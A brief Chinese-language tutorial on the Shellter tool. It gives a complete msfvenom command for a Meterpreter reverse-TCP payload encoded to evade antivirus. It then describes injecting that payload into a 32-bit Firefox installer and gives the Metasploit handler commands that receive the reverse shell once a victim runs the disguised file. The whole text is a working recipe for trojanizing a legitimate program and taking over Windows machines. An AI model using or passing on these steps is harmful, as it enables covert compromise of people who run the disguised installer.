Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用
Shellter
Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序)。shellcode也可以通过Metasploit生成的payload免杀。
准备
- 使用kali linux
- 安装 shellter
apt install shellter或者 官网下载
1.使用Metasploit生成 payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw
2.使用Shellter选择捆绑exe文件
- 目录下放置一个32位的exe程序,我以Firefox-latest.exe 为例
3.把 fud.raw 注入到exe程序
4.启动Metasploit监听
代码语言:javascript复制msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1337
exploit* 启动监听之后,把目录下的 Firefox-latest.exe 文件放置 windows 电脑下运行即可主机上线
- 杀毒引擎扫描结果
